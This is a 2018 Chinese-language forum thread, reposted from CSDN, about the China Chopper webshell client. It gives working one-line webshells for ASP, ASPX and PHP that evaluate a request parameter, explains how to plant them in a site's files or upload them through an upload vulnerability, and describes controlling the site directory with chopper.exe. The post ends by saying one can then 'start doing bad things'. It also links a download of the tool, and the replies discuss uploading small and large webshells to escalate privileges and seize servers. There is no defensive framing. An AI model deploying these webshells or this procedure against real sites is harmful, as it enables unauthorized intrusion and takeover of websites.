51Testing软件测试论坛

标题: 中国菜刀与一句话木马 [打印本页]

作者: 大路路 时间: 2018-7-12 14:27
标题: 中国菜刀与一句话木马
本帖最后由大路路于 2018-7-12 14:37 编辑

中国菜刀下载地址: http://pan.baidu.com/share/link?shareid=871753024&uk=388464620
一.基本操作:
往目标网站中加入一句话木马，然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录
二.实战
asp的一句话是：
<%eval request ("pass")%>
aspx的一句话是：
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句话是：
<?php @eval($_POST['pass']);?>
我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上，或者直接创建一个新的文件，在里面写入这些语句，然后把文件上传到网站上即可。
下面举个小例子:

[attach]117120[/attach]

然后假设我们有个智障网站有这样的漏洞:

[attach]117121[/attach]

我们把这个lubr.php上传上去后，打开chopper.exe

[attach]117122[/attach]

接到这个网址下我们的菜刀文件上，右键点击文件管理，就可以获取整个网站的目录了～然后就可以开始做坏事。
来源：CSDN

相关教程推荐：
[attach]117123[/attach]
http://www.atstudy.com/course/767

作者: 17800455 时间: 2018-7-13 14:09
网站上传漏洞吗。以前用挖掘机工具，可以挖到。然后，上传asp小马，之后访问小马，插入大马提权。
就可以拿下，后台权限了。
至于能不能拿下肉机，看水平了。

作者: 冷逸 时间: 2018-7-16 11:41

17800455 发表于 2018-7-13 14:09
网站上传漏洞吗。以前用挖掘机工具，可以挖到。然后，上传asp小马，之后访问小马，插入大马提权。
就可以 ...

挖掘机拿站是历史了，现在上传漏洞更多的是看绕过技巧，当然也有批量

作者: 冷逸 时间: 2018-7-16 11:41

17800455 发表于 2018-7-13 14:09
网站上传漏洞吗。以前用挖掘机工具，可以挖到。然后，上传asp小马，之后访问小马，插入大马提权。
就可以 ...

挖掘机拿站是历史了，现在上传漏洞更多的是看绕过技巧，当然也有批量

欢迎光临 51Testing软件测试论坛 (http://bbs.51testing.com/)